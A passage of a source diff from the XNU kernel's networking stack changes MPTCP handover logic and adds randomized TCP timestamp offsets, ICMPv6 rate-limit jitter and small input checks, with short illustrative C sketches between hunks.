                if (IFNET_IS_CELLULAR(inp->inp_last_outifp) &&
                    !(tp->t_mpflags & TMPF_BACKUP_PATH) &&
-                   mpte->mpte_svctype < MPTCP_SVCTYPE_AGGREGATE) {
+                   mptcp_subflows_need_backup_flag(mpte)) {
                        tp->t_mpflags |= (TMPF_BACKUP_PATH | TMPF_SND_MPPRIO);
                        mpts->mpts_flags &= ~MPTSF_PREFERRED;
                } else {
@@ -6276,6 +6377,7 @@ mptcp_wifi_status_changed(void)
 
                /* Only handover- and urgency-mode are purely driven by Symptom's Wi-Fi status */
                if (mpte->mpte_svctype != MPTCP_SVCTYPE_HANDOVER &&
+                   mpte->mpte_svctype != MPTCP_SVCTYPE_PURE_HANDOVER &&
                    mpte->mpte_svctype != MPTCP_SVCTYPE_TARGET_BASED) {
                        goto next;
                }
@@ -6290,12 +6392,68 @@ next:
        lck_mtx_unlock(&mtcbinfo.mppi_lock);
 }
 
+struct mptcp_uuid_search_info {
+       uuid_t target_uuid;
+       proc_t found_proc;
+       boolean_t is_proc_found;
+};
+
+static int
+mptcp_find_proc_filter(proc_t p, void *arg)
+{
+       struct mptcp_uuid_search_info *info = (struct mptcp_uuid_search_info *)arg;
+       int found;
+
+       if (info->is_proc_found) {
+               return 0;
+       }
+
+       /*
+        * uuid_compare() returns 0 when the UUIDs match, but the proc filter
+        * is expected to return non-zero for a match.
+        */
+       found = uuid_compare(p->p_uuid, info->target_uuid) == 0;
+       if (found) {
+               info->is_proc_found = true;
+       }
+
+       return found;
+}
+
+static int
+mptcp_find_proc_callout(proc_t p, void * arg)
+{
+       struct mptcp_uuid_search_info *info = (struct mptcp_uuid_search_info *)arg;
+
+       if (uuid_compare(p->p_uuid, info->target_uuid) == 0) {
+               info->found_proc = p;
+               return PROC_CLAIMED_DONE;
+       }
+
+       return PROC_RETURNED;
+}
+
+static proc_t
+mptcp_find_proc(const uuid_t uuid)
+{
+       struct mptcp_uuid_search_info info;
+
+       uuid_copy(info.target_uuid, uuid);
+       info.found_proc = PROC_NULL;
+       info.is_proc_found = false;
+
+       proc_iterate(PROC_ALLPROCLIST, mptcp_find_proc_callout, &info,
+           mptcp_find_proc_filter, &info);
+
+       return info.found_proc;
+}
+
 void
 mptcp_ask_symptoms(struct mptses *mpte)
 {
        struct mptcp_symptoms_ask_uuid ask;
        struct socket *mp_so;
-       struct proc *p;
+       struct proc *p = PROC_NULL;
        int pid, prio, err;
 
        if (mptcp_kern_skt_unit == 0) {
@@ -6307,26 +6465,50 @@ mptcp_ask_symptoms(struct mptses *mpte)
        mp_so = mptetoso(mpte);
 
        if (mp_so->so_flags & SOF_DELEGATED) {
-               pid = mp_so->e_pid;
-       } else {
-               pid = mp_so->last_pid;
-       }
+               if (mpte->mpte_epid != 0) {
+                       p = proc_find(mpte->mpte_epid);
+                       if (p != PROC_NULL) {
+                               /* We found a pid, check its UUID */
+                               if (uuid_compare(mp_so->e_uuid, p->p_uuid)) {
+                                       /* It's not the same - we need to look for the real proc */
+                                       proc_rele(p);
+                                       p = PROC_NULL;
+                               }
+                       }
+               }
 
-       p = proc_find(pid);
-       if (p == PROC_NULL) {
-               os_log_error(mptcp_log_handle, "%s - %lx: Couldn't find proc for pid %u\n",
-                   __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte), pid);
-               return;
-       }
+               if (p == PROC_NULL) {
+                       p = mptcp_find_proc(mp_so->e_uuid);
+                       if (p == PROC_NULL) {
+                               uuid_string_t uuid_string;
+                               uuid_unparse(mp_so->e_uuid, uuid_string);
 
-       ask.cmd = MPTCP_SYMPTOMS_ASK_UUID;
+                               os_log_error(mptcp_log_handle, "%s - %lx: Couldn't find proc for uuid %s\n",
+                                   __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte), uuid_string);
 
-       if (mp_so->so_flags & SOF_DELEGATED) {
+                               return;
+                       }
+                       mpte->mpte_epid = proc_pid(p);
+               }
+
+               pid = mpte->mpte_epid;
                uuid_copy(ask.uuid, mp_so->e_uuid);
        } else {
+               pid = mp_so->last_pid;
+
+               p = proc_find(pid);
+               if (p == PROC_NULL) {
+                       os_log_error(mptcp_log_handle, "%s - %lx: Couldn't find proc for pid %u\n",
+                           __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte), pid);
+                       return;
+               }
+
                uuid_copy(ask.uuid, mp_so->last_uuid);
        }
 
+
+       ask.cmd = MPTCP_SYMPTOMS_ASK_UUID;
+
        prio = proc_get_effective_task_policy(proc_task(p), TASK_POLICY_ROLE);
 
        if (prio == TASK_BACKGROUND_APPLICATION || prio == TASK_NONUI_APPLICATION ||
index ff16b486f8468a8e7f07a85194eddb7e2c9c83d4..533b1ac3087dfb7109f4e9f5e8587df9cecf68d7 100644 (file)
@@ -109,6 +109,10 @@ int mptcp_developer_mode = 0;
 SYSCTL_INT(_net_inet_mptcp, OID_AUTO, allow_aggregate, CTLFLAG_RW | CTLFLAG_LOCKED,
     &mptcp_developer_mode, 0, "Allow the Multipath aggregation mode");
 
+int mptcp_no_first_party = 0;
+SYSCTL_INT(_net_inet_mptcp, OID_AUTO, no_first_party, CTLFLAG_RW | CTLFLAG_LOCKED,
+    &mptcp_no_first_party, 0, "Do not do first-party app exemptions");
+
 static unsigned long mptcp_expected_progress_headstart = 5000;
 SYSCTL_ULONG(_net_inet_mptcp, OID_AUTO, expected_progress_headstart, CTLFLAG_RW | CTLFLAG_LOCKED,
     &mptcp_expected_progress_headstart, "Headstart to give MPTCP before meeting the progress deadline");
@@ -222,6 +226,10 @@ mptcp_entitlement_check(struct socket *mp_so, uint8_t svctype)
 {
        struct mptses *mpte = mpsotompte(mp_so);
 
+       if (mptcp_no_first_party) {
+               return 0;
+       }
+
        /* First, check for mptcp_extended without delegation */
        if (soopt_cred_check(mp_so, PRIV_NET_RESTRICTED_MULTIPATH_EXTENDED, TRUE, FALSE) == 0) {
                /*
@@ -341,6 +349,12 @@ mptcp_usr_connectx(struct socket *mp_so, struct sockaddr *src,
 
        if ((mp_so->so_state & (SS_ISCONNECTED | SS_ISCONNECTING)) == 0) {
                memcpy(&mpte->mpte_u_dst, dst, dst->sa_len);
+
+               if (dst->sa_family == AF_INET) {
+                       memcpy(&mpte->mpte_sub_dst_v4, dst, dst->sa_len);
+               } else {
+                       memcpy(&mpte->mpte_sub_dst_v6, dst, dst->sa_len);
+               }
        }
 
        if (src) {
@@ -887,7 +901,7 @@ mptcp_disconnect(struct mptses *mpte)
            struct socket *, mp_so, struct mptcb *, mp_tp);
 
        /* if we're not detached, go thru socket state checks */
-       if (!(mp_so->so_flags & SOF_PCBCLEARING)) {
+       if (!(mp_so->so_flags & SOF_PCBCLEARING) && !(mp_so->so_flags & SOF_DEFUNCT)) {
                if (!(mp_so->so_state & (SS_ISCONNECTED |
                    SS_ISCONNECTING))) {
                        error = ENOTCONN;
@@ -953,7 +967,7 @@ mptcp_finish_usrclosed(struct mptses *mpte)
        struct mptcb *mp_tp = mpte->mpte_mptcb;
        struct socket *mp_so = mptetoso(mpte);
 
-       if (mp_tp->mpt_state == MPTCPS_CLOSED) {
+       if (mp_tp->mpt_state == MPTCPS_CLOSED || mp_tp->mpt_state == MPTCPS_TERMINATE) {
                mpte = mptcp_close(mpte, mp_tp);
        } else if (mp_tp->mpt_state >= MPTCPS_FIN_WAIT_2) {
                soisdisconnected(mp_so);
@@ -982,7 +996,8 @@ mptcp_usrclosed(struct mptses *mpte)
        mptcp_close_fsm(mp_tp, MPCE_CLOSE);
 
        /* Not everything has been acknowledged - don't close the subflows! */
-       if (mp_tp->mpt_sndnxt + 1 != mp_tp->mpt_sndmax) {
+       if (mp_tp->mpt_state != MPTCPS_TERMINATE &&
+           mp_tp->mpt_sndnxt + 1 != mp_tp->mpt_sndmax) {
                return mpte;
        }
 
@@ -1648,6 +1663,7 @@ mptcp_setopt(struct mptses *mpte, struct sockopt *sopt)
                case PERSIST_TIMEOUT:
                case TCP_ADAPTIVE_READ_TIMEOUT:
                case TCP_ADAPTIVE_WRITE_TIMEOUT:
+               case TCP_FASTOPEN_FORCE_ENABLE:
                        /* eligible; record it */
                        break;
                case TCP_NOTSENT_LOWAT:
@@ -2011,6 +2027,7 @@ mptcp_getopt(struct mptses *mpte, struct sockopt *sopt)
        case TCP_RXT_CONNDROPTIME:
        case TCP_ADAPTIVE_READ_TIMEOUT:
        case TCP_ADAPTIVE_WRITE_TIMEOUT:
+       case TCP_FASTOPEN_FORCE_ENABLE:
        {
                struct mptopt *mpo = mptcp_sopt_find(mpte, sopt);
 
@@ -2213,6 +2230,8 @@ mptcp_sopt2str(int level, int optname)
                        return "ADAPTIVE_READ_TIMEOUT";
                case TCP_ADAPTIVE_WRITE_TIMEOUT:
                        return "ADAPTIVE_WRITE_TIMEOUT";
+               case TCP_FASTOPEN_FORCE_ENABLE:
+                       return "TCP_FASTOPEN_FORCE_ENABLE";
                case MPTCP_SERVICE_TYPE:
                        return "MPTCP_SERVICE_TYPE";
                case MPTCP_ALTERNATE_PORT:
index cc16b1c705ae140fa65f1fed052f9e736ef989cb..17aa71b7817f6a0a995df971a46c23490c7e072b 100644 (file)
@@ -93,10 +93,8 @@ struct mptses {
 #define __mpte_dst_v4 mpte_u_dst._mpte_dst_v4
 #define __mpte_dst_v6 mpte_u_dst._mpte_dst_v6
 
-       struct sockaddr_in mpte_dst_v4_nat64;
-
-       struct sockaddr_in mpte_dst_unicast_v4;
-       struct sockaddr_in6 mpte_dst_unicast_v6;
+       struct sockaddr_in      mpte_sub_dst_v4;
+       struct sockaddr_in6     mpte_sub_dst_v6;
 
        uint16_t        mpte_alternate_port;    /* Alternate port for subflow establishment (network-byte-order) */
 
@@ -205,6 +203,12 @@ mptcp_subflow_cwnd_space(struct socket *so)
        return MIN(cwnd, sbspace(&so->so_snd));
 }
 
+static inline bool
+mptcp_subflows_need_backup_flag(struct mptses *mpte)
+{
+       return mpte->mpte_svctype < MPTCP_SVCTYPE_AGGREGATE ||
+              mpte->mpte_svctype == MPTCP_SVCTYPE_PURE_HANDOVER;
+}
 
 /*
  * MPTCP socket options
@@ -639,7 +643,6 @@ extern void mptcp_ask_symptoms(struct mptses *mpte);
 extern void mptcp_control_register(void);
 extern int mptcp_is_wifi_unusable_for_session(struct mptses *mpte);
 extern boolean_t symptoms_is_wifi_lossy(void);
-extern void mptcp_ask_for_nat64(struct ifnet *ifp);
 extern void mptcp_session_necp_cb(void *, int, uint32_t, uint32_t, bool *);
 extern struct sockaddr *mptcp_get_session_dst(struct mptses *mpte,
     boolean_t has_v6, boolean_t has_v4);
index a140e89253d546f4543a4f27de7168d4b4691e89..2975ccff192821e5c165668226c4ddc267328104 100644 (file)
@@ -934,6 +934,9 @@ rip_attach(struct socket *so, int proto, struct proc *p)
        if ((so->so_state & SS_PRIV) == 0) {
                return EPERM;
        }
+       if (proto > UINT8_MAX) {
+               return EINVAL;
+       }
 
        error = soreserve(so, rip_sendspace, rip_recvspace);
        if (error) {
index b63fc818bc5bacbb8acf16a21eda8e71662492e1..3021fb0b5b5d8291b8e5a98c2bae77b9c7cbc3d7 100644 (file)
@@ -293,7 +293,9 @@ struct tcp_notify_ack_complete {
 #define MPTCP_SVCTYPE_INTERACTIVE       1
 #define MPTCP_SVCTYPE_AGGREGATE         2
 #define MPTCP_SVCTYPE_TARGET_BASED      3
-#define MPTCP_SVCTYPE_MAX               4
+#define MPTCP_SVCTYPE_PURE_HANDOVER     4
+#define MPTCP_SVCTYPE_MAX               5
+
 /*
  * Specify minimum time in seconds before which an established
  * TCP connection will not be dropped when there is no response from the
@@ -322,10 +324,15 @@ struct tcp_notify_ack_complete {
 #define TCPI_FLAG_STREAMING_ON  0x02    /* Streaming detection on */
 
 struct tcp_conn_status {
-       unsigned int    probe_activated : 1;
-       unsigned int    write_probe_failed : 1;
-       unsigned int    read_probe_failed : 1;
-       unsigned int    conn_probe_failed : 1;
+       union {
+               struct {
+                       unsigned int    probe_activated : 1;
+                       unsigned int    write_probe_failed : 1;
+                       unsigned int    read_probe_failed : 1;
+                       unsigned int    conn_probe_failed : 1;
+               };
+               uint32_t        pad_field;
+       };
 };
 
 /*
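
The union added above wraps the existing probe-status bits together with a 32-bit pad_field. A minimal user-space sketch of what that layout buys (illustrative only, not part of the commit; the structure is re-declared locally and the size assertion reflects common ABIs): the flags keep occupying exactly four bytes, and all of them can be read or cleared through pad_field in a single access.

#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>

struct conn_status_demo {               /* local stand-in for tcp_conn_status */
	union {
		struct {
			unsigned int probe_activated : 1;
			unsigned int write_probe_failed : 1;
			unsigned int read_probe_failed : 1;
			unsigned int conn_probe_failed : 1;
		};
		uint32_t pad_field;     /* whole-word view of the flag bits */
	};
};

/* on the usual ILP32/LP64 ABIs the union pins the structure to 32 bits */
_Static_assert(sizeof(struct conn_status_demo) == sizeof(uint32_t),
    "demo structure should stay 4 bytes");

int
main(void)
{
	struct conn_status_demo cs = { .pad_field = 0 };    /* clears every flag at once */

	cs.write_probe_failed = 1;
	printf("raw word = 0x%08" PRIx32 "\n", cs.pad_field);
	return 0;
}
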
index bb33ba1acf0b41b2e40bf929d6fa70eb48ce1a38..d91a93a61fbede696c07135c557c79bd994dfafd 100644 (file)
@@ -2237,6 +2237,11 @@ findpcb:
                goto dropwithreset;
        }
 
+       /* Now that we found the tcpcb, we can adjust the TCP timestamp */
+       if (to.to_flags & TOF_TS) {
+               to.to_tsecr -= tp->t_ts_offset;
+       }
+
        TCP_LOG_TH_FLAGS(TCP_LOG_HDR, th, tp, false, ifp);
 
        if (tp->t_state == TCPS_CLOSED) {
@@ -2889,7 +2894,8 @@ findpcb:
         * be TH_NEEDSYN.
         */
        if (tp->t_state == TCPS_ESTABLISHED &&
-           (thflags & (TH_SYN | TH_FIN | TH_RST | TH_URG | TH_ACK | TH_ECE | TH_CWR)) == TH_ACK &&
+           !(so->so_state & SS_CANTRCVMORE) &&
+           (thflags & TH_FLAGS) == TH_ACK &&
            ((tp->t_flags & TF_NEEDFIN) == 0) &&
            ((to.to_flags & TOF_TS) == 0 ||
            TSTMP_GEQ(to.to_tsval, tp->ts_recent)) &&
@@ -3066,11 +3072,6 @@ findpcb:
                        so_recv_data_stat(so, m, 0);
                        m_adj(m, drop_hdrlen);  /* delayed header drop */
 
-                       /*
-                        * If message delivery (SOF_ENABLE_MSGS) is enabled on
-                        * this socket, deliver the packet received as an
-                        * in-order message with sequence number attached to it.
-                        */
                        if (isipv6) {
                                memcpy(&saved_hdr, ip6, sizeof(struct ip6_hdr));
                                ip6 = (struct ip6_hdr *)&saved_hdr[0];
@@ -3929,6 +3930,11 @@ close:
                        close_it = TRUE;
                }
 
+               if (so->so_state & SS_CANTRCVMORE) {
+                       TCP_LOG_DROP_PCB(TCP_LOG_HDR, th, tp, false, "SS_CANTRCVMORE");
+                       close_it = TRUE;
+               }
+
                if (close_it) {
                        tp = tcp_close(tp);
                        tcpstat.tcps_rcvafterclose++;
@@ -5165,6 +5171,11 @@ dodata:
                    (m->m_pkthdr.pkt_flags & PKTF_MPTCP_DFIN) &&
                    (m->m_pkthdr.pkt_flags & PKTF_MPTCP)) {
                        m_adj(m, drop_hdrlen);  /* delayed header drop */
+                       /*
+                        * 0-length DATA_FIN: the rlen is actually 0. The byte consumed by
+                        * the DATA_FIN is special-cased in mptcp_input and mptcp_reass_present.
+                        */
+                       m->m_pkthdr.mp_rlen = 0;
                        mptcp_input(tptomptp(tp)->mpt_mpte, m);
                        tp->t_flags |= TF_ACKNOW;
                } else {
@@ -5457,6 +5468,7 @@ tcp_dooptions(struct tcpcb *tp, u_char *cp, int cnt, struct tcphdr *th,
                        bcopy((char *)cp + 6,
                            (char *)&to->to_tsecr, sizeof(to->to_tsecr));
                        NTOHL(to->to_tsecr);
+                       to->to_tsecr -= tp->t_ts_offset;
                        /* Re-enable sending Timestamps if we received them */
                        if (!(tp->t_flags & TF_REQ_TSTMP)) {
                                tp->t_flags |= TF_REQ_TSTMP;
index 84fe091ccec8c585712c7a74fb687d2ea2f112c0..5eecbbbf5e3b1f37b723fdbba6542a19d940ea06 100644 (file)
@@ -155,6 +155,10 @@ SYSCTL_SKMEM_TCP_INT(OID_AUTO, ack_compression_rate,
     CTLFLAG_RW | CTLFLAG_LOCKED, int, tcp_ack_compression_rate, TCP_COMP_CHANGE_RATE,
     "Rate at which we force sending new ACKs (in ms)");
 
+SYSCTL_SKMEM_TCP_INT(OID_AUTO, randomize_timestamps,
+    CTLFLAG_RW | CTLFLAG_LOCKED, int, tcp_randomize_timestamps, 1,
+    "Randomize TCP timestamps to prevent tracking (on: 1, off: 0)");
+
 static int
 sysctl_change_ecn_setting SYSCTL_HANDLER_ARGS
 {
@@ -1636,7 +1640,7 @@ send:
 
                /* Form timestamp option as shown in appendix A of RFC 1323. */
                *lp++ = htonl(TCPOPT_TSTAMP_HDR);
-               *lp++ = htonl(tcp_now);
+               *lp++ = htonl(tcp_now + tp->t_ts_offset);
                *lp   = htonl(tp->ts_recent);
                optlen += TCPOLEN_TSTAMP_APPA;
        }
@@ -2814,9 +2818,9 @@ out:
                }
                /*
                 * Unless this is due to interface restriction policy,
-                * treat EHOSTUNREACH/ENETDOWN as a soft error.
+                * treat EHOSTUNREACH/ENETDOWN/EADDRNOTAVAIL as a soft error.
                 */
-               if ((error == EHOSTUNREACH || error == ENETDOWN) &&
+               if ((error == EHOSTUNREACH || error == ENETDOWN || error == EADDRNOTAVAIL) &&
                    TCPS_HAVERCVDSYN(tp->t_state) &&
                    !inp_restricted_send(inp, inp->inp_last_outifp)) {
                        tp->t_softerror = error;
index fe3a0192ad282fe007097ecb7eb7fbe9e34f062d..0b2a5513833ed0c4d762441c0b09c047b6c122ee 100644 (file)
@@ -1032,6 +1032,7 @@ tcp_newtcpcb(struct inpcb *inp)
        struct tcpcb *tp;
        struct socket *so = inp->inp_socket;
        int isipv6 = (inp->inp_vflag & INP_IPV6) != 0;
+       uint32_t random_32;
 
        calculate_tcp_clock();
 
@@ -1104,14 +1105,19 @@ tcp_newtcpcb(struct inpcb *inp)
        tp->t_twentry.tqe_next = NULL;
        tp->t_twentry.tqe_prev = NULL;
 
+       read_frandom(&random_32, sizeof(random_32));
        if (__probable(tcp_do_ack_compression)) {
-               read_frandom(&tp->t_comp_gencnt, sizeof(tp->t_comp_gencnt));
+               tp->t_comp_gencnt = random_32;
                if (tp->t_comp_gencnt <= TCP_ACK_COMPRESSION_DUMMY) {
                        tp->t_comp_gencnt = TCP_ACK_COMPRESSION_DUMMY + 1;
                }
                tp->t_comp_lastinc = tcp_now;
        }
 
+       if (__probable(tcp_randomize_timestamps)) {
+               tp->t_ts_offset = random_32;
+       }
+
        /*
         * IPv4 TTL initialization is necessary for an IPv6 socket as well,
         * because the socket may be bound to an IPv6 wildcard address,
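
Taken together, the timestamp changes above add a per-connection random offset (t_ts_offset) to every TSval that tcp_output puts on the wire and subtract the same offset from the echoed TSecr on input. A small standalone sketch (illustrative values, not part of the commit) of why unsigned 32-bit wraparound makes that transformation invertible while hiding the host's raw tcp_now clock from on-path observers:

#include <stdint.h>
#include <stdio.h>

int
main(void)
{
	uint32_t tcp_now = 123456;          /* local millisecond tick (illustrative) */
	uint32_t t_ts_offset = 0xfffffff0;  /* random per-connection offset, near the wrap point */

	/* send side: the TSval carried on the wire is the shifted clock */
	uint32_t tsval_wire = tcp_now + t_ts_offset;

	/* the peer echoes that value back unchanged as TSecr ... */
	uint32_t tsecr_echoed = tsval_wire;

	/* ... and the receive side recovers the original clock by subtracting
	 * the offset, even though the addition wrapped around 2^32 */
	uint32_t tsecr_local = tsecr_echoed - t_ts_offset;

	printf("on wire %u, recovered %u, original %u\n",
	    tsval_wire, tsecr_local, tcp_now);
	return 0;
}
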
index 5012199aa4b70c2603795edecb656cb294d1fd97..2070bab17f34fa4150e5666cb6621908e66fe947 100644 (file)
@@ -1052,7 +1052,8 @@ retransmit_packet:
                    (so->so_flags & SOF_MP_SUBFLOW)) {
                        struct mptses *mpte = tptomptp(tp)->mpt_mpte;
 
-                       if (mpte->mpte_svctype == MPTCP_SVCTYPE_HANDOVER) {
+                       if (mpte->mpte_svctype == MPTCP_SVCTYPE_HANDOVER ||
+                           mpte->mpte_svctype == MPTCP_SVCTYPE_PURE_HANDOVER) {
                                mptcp_check_subflows_and_add(mpte);
                        }
                }
index fca0d56a6d27855550e7b22fb2602f2c13f3bd4b..861c9f71da92bd040980b634d88f920f44d446d2 100644 (file)
@@ -685,10 +685,18 @@ tcp6_usr_connect(struct socket *so, struct sockaddr *nam, struct proc *p)
                struct sockaddr_in sin;
 
                if ((inp->inp_flags & IN6P_IPV6_V6ONLY) != 0) {
-                       return EINVAL;
+                       error = EINVAL;
+                       goto out;
                }
 
                in6_sin6_2_sin(&sin, sin6p);
+               /*
+                * Must disallow TCP ``connections'' to multicast addresses.
+                */
+               if (IN_MULTICAST(ntohl(sin.sin_addr.s_addr))) {
+                       error = EAFNOSUPPORT;
+                       goto out;
+               }
                inp->inp_vflag |= INP_IPV4;
                inp->inp_vflag &= ~INP_IPV6;
                if ((error = tcp_connect(tp, (struct sockaddr *)&sin, p)) != 0) {
index 3a93146aeaa466b5363b442b0af2fc643256c978..b332da0957430ce25d3c7763d7de86fe1710ff4a 100644 (file)
@@ -69,6 +69,9 @@
 #include <netinet/in_pcb.h>
 #include <netinet/tcp.h>
 #include <netinet/tcp_timer.h>
+#if !KERNEL
+#include <TargetConditionals.h>
+#endif
 
 #if defined(__LP64__)
 #define _TCPCB_PTR(x)                   u_int32_t
@@ -642,6 +645,8 @@ struct tcpcb {
        uint32_t        t_comp_lastinc; /* Last time the gen-count was changed - should change every TCP_COMP_CHANGE_RATE ms */
 #define TCP_COMP_CHANGE_RATE    5 /* Intervals at which we change the gencnt. Means that worst-case we send one ACK every TCP_COMP_CHANGE_RATE ms */
 
+       uint32_t        t_ts_offset; /* Randomized timestamp offset to hide on-the-wire timestamp */
+
        uuid_t          t_fsw_uuid;
        uuid_t          t_flow_uuid;
 };
@@ -1227,7 +1232,7 @@ struct  xtcpcb {
        u_quad_t        xt_alignment_hack;
 };
 
-#if XNU_TARGET_OS_OSX || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR)
+#if XNU_TARGET_OS_OSX || KERNEL || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR)
 
 struct  xtcpcb64 {
        u_int32_t               xt_len;
@@ -1308,7 +1313,7 @@ struct  xtcpcb64 {
        u_quad_t                xt_alignment_hack;
 };
 
-#endif /* XNU_TARGET_OS_OSX || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR) */
+#endif /* XNU_TARGET_OS_OSX || KERNEL || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR) */
 
 #ifdef PRIVATE
 
@@ -1497,6 +1502,7 @@ extern uint32_t tcp_do_autorcvbuf;
 extern uint32_t tcp_autorcvbuf_max;
 extern int tcp_recv_bg;
 extern int tcp_do_ack_compression;
+extern int tcp_randomize_timestamps;
 /*
  * Dummy value used for when there is no flow and we want to ensure that compression
  * can happen.
index e789cb7bc5ace708ce3f310ca68343b85fd5a774..f8214f1323a07fa83e0b6e27de817136901f6bb1 100644 (file)
@@ -2346,12 +2346,8 @@ udp_disconnect(struct socket *so)
        struct inpcb *inp;
 
        inp = sotoinpcb(so);
-       if (inp == NULL
-#if NECP
-           || (necp_socket_should_use_flow_divert(inp))
-#endif /* NECP */
-           ) {
-               return inp == NULL ? EINVAL : EPROTOTYPE;
+       if (inp == NULL) {
+               return EINVAL;
        }
        if (inp->inp_faddr.s_addr == INADDR_ANY) {
                return ENOTCONN;
index 08954c8ef688dc342ffa93a72b70748ec1b8ebb0..6e276598c69b8e4f5367cf91491243ed030c21de 100644 (file)
@@ -148,6 +148,7 @@ struct icmp6stat icmp6stat;
 
 extern struct inpcbhead ripcb;
 extern int icmp6errppslim;
+extern int icmp6errppslim_random_incr;
 extern int icmp6rappslim;
 static int icmp6errpps_count = 0;
 static int icmp6rapps_count = 0;
@@ -186,6 +187,11 @@ icmp6_init(struct ip6protosw *pp, struct domain *dp)
        if (!icmp6_initialized) {
                icmp6_initialized = 1;
                mld_init();
+               if (icmp6errppslim >= 0 &&
+                   icmp6errppslim_random_incr > 0 &&
+                   icmp6errppslim <= INT32_MAX - (icmp6errppslim_random_incr + 1)) {
+                       icmp6errppslim += (random() % icmp6errppslim_random_incr) + 1;
+               }
        }
 }
 
@@ -3296,8 +3302,17 @@ icmp6_ratelimit(
                }
        } else if (!ppsratecheck(&icmp6errppslim_last, &icmp6errpps_count,
            icmp6errppslim)) {
-               /* The packet is subject to rate limit */
-               ret++;
+               /*
+                * We add some randomness here to still generate ICMPv6 error
+                * post icmp6errppslim limit with a probability that goes down
+                * with increased value of icmp6errpps_count.
+                */
+               if (icmp6errpps_count > 0 && icmp6errppslim > 0 &&
+                   icmp6errpps_count > icmp6errppslim &&
+                   (random() % (icmp6errpps_count - icmp6errppslim)) != 0) {
+                       /* The packet is subject to rate limit */
+                       ret++;
+               }
        }
 
        return ret;
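
As a rough illustration of the probability the new comment above describes (a sketch, not part of the commit; rand() stands in for the kernel's random(), and the variable names are local stand-ins): once icmp6errpps_count exceeds icmp6errppslim, an error is still emitted only when the remainder is zero, i.e. with probability roughly 1/(count - limit), which shrinks as the excess grows.

#include <stdio.h>
#include <stdlib.h>

int
main(void)
{
	const int limit = 500;              /* stands in for icmp6errppslim */
	const int trials = 100000;

	for (int count = 501; count <= 1501; count += 500) {
		int emitted = 0;

		for (int i = 0; i < trials; i++) {
			/* mirrors the added kernel check: a non-zero remainder means the
			 * packet is rate-limited, zero means the error still goes out */
			if ((rand() % (count - limit)) == 0) {
				emitted++;
			}
		}
		printf("count=%d: observed %.4f, expected %.4f\n",
		    count, (double)emitted / trials, 1.0 / (count - limit));
	}
	return 0;
}
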
index 6ee55d379576f13e3c6c01bcab816d140119875c..f64ee80af4379b1f3693ca4d513d0d7c2076314a 100644 (file)
@@ -485,9 +485,11 @@ u_int32_t       rip6_recvspace = RIPV6RCVQ;
 /* ICMPV6 parameters */
 int     icmp6_rediraccept = 1;          /* accept and process redirects */
 int     icmp6_redirtimeout = 10 * 60;   /* 10 minutes */
-int     icmp6errppslim = 500;           /* 500 packets per second */
+uint32_t     icmp6errppslim = 500;           /* 500 packets per second */
+uint32_t     icmp6errppslim_random_incr = 500; /* We further randomize icmp6errppslim
+                                                * with this during ICMPv6 initialization */
 int     icmp6rappslim = 10;             /* 10 packets per second */
-int     icmp6_nodeinfo = 3;             /* enable/disable NI response */
+int     icmp6_nodeinfo = 0;             /* enable/disable NI response */
 
 /* UDP on IP6 parameters */
 int     udp6_sendspace = 9216;          /* really max datagram size */
@@ -749,6 +751,8 @@ SYSCTL_INT(_net_inet6_icmp6, ICMPV6CTL_NODEINFO,
     nodeinfo, CTLFLAG_RW | CTLFLAG_LOCKED, &icmp6_nodeinfo, 0, "");
 SYSCTL_INT(_net_inet6_icmp6, ICMPV6CTL_ERRPPSLIMIT,
     errppslimit, CTLFLAG_RW | CTLFLAG_LOCKED, &icmp6errppslim, 0, "");
+SYSCTL_INT(_net_inet6_icmp6, ICMPV6CTL_ERRPPSLIMIT_RANDOM_INCR,
+    errppslimit_random_incr, CTLFLAG_RW | CTLFLAG_LOCKED, &icmp6errppslim_random_incr, 0, "");
 SYSCTL_INT(_net_inet6_icmp6, OID_AUTO,
     rappslimit, CTLFLAG_RW | CTLFLAG_LOCKED, &icmp6rappslim, 0, "");
 SYSCTL_INT(_net_inet6_icmp6, ICMPV6CTL_ND6_DEBUG,
index d0a36689a8bbfa1a13ed6aab54336d33ef728a5c..91a87a8a89697ed90f805ece330744432049e479 100644 (file)
@@ -71,7 +71,7 @@
 #include <libkern/OSAtomic.h>
 #include "gss_krb5_mech.h"
 
-lck_grp_t *gss_krb5_mech_grp;
+LCK_GRP_DECLARE(gss_krb5_mech_grp, "gss_krb5_mech");
 
 typedef struct crypt_walker_ctx {
        size_t length;
@@ -198,7 +198,6 @@ gss_krb5_mech_init(void)
                }
                return;
        }
-       gss_krb5_mech_grp = lck_grp_alloc_init("gss_krb5_mech", LCK_GRP_ATTR_NULL);
        gss_krb5_mech_initted = GSS_KRB5_INITIALIZED;
 }
 
@@ -578,12 +577,12 @@ krb5_mic(crypto_ctx_t ctx, gss_buffer_t header, gss_buffer_t bp, gss_buffer_t tr
 
        if (ikey) {
                if (!(ctx->flags & CRYPTO_KS_ALLOCED)) {
-                       lck_mtx_lock(ctx->lock);
+                       lck_mtx_lock(&ctx->lock);
                        if (!(ctx->flags & CRYPTO_KS_ALLOCED)) {
                                cc_key_schedule_create(ctx);
                        }
                        ctx->flags |= CRYPTO_KS_ALLOCED;
-                       lck_mtx_unlock(ctx->lock);
+                       lck_mtx_unlock(&ctx->lock);
                }
                key2use = ctx->ks.ikey[kdx];
        } else {
@@ -625,12 +624,12 @@ krb5_mic_mbuf(crypto_ctx_t ctx, gss_buffer_t header,
 
        if (ikey) {
                if (!(ctx->flags & CRYPTO_KS_ALLOCED)) {
-                       lck_mtx_lock(ctx->lock);
+                       lck_mtx_lock(&ctx->lock);
                        if (!(ctx->flags & CRYPTO_KS_ALLOCED)) {
                                cc_key_schedule_create(ctx);
                        }
                        ctx->flags |= CRYPTO_KS_ALLOCED;
-                       lck_mtx_unlock(ctx->lock);
+                       lck_mtx_unlock(&ctx->lock);
                }
                key2use = ctx->ks.ikey[kdx];
        } else {
@@ -679,12 +678,12 @@ krb5_crypt_mbuf(crypto_ctx_t ctx, mbuf_t *mbp, size_t len, int encrypt, cccbc_ct
        int error;
 
        if (!(ctx->flags & CRYPTO_KS_ALLOCED)) {
-               lck_mtx_lock(ctx->lock);
+               lck_mtx_lock(&ctx->lock);
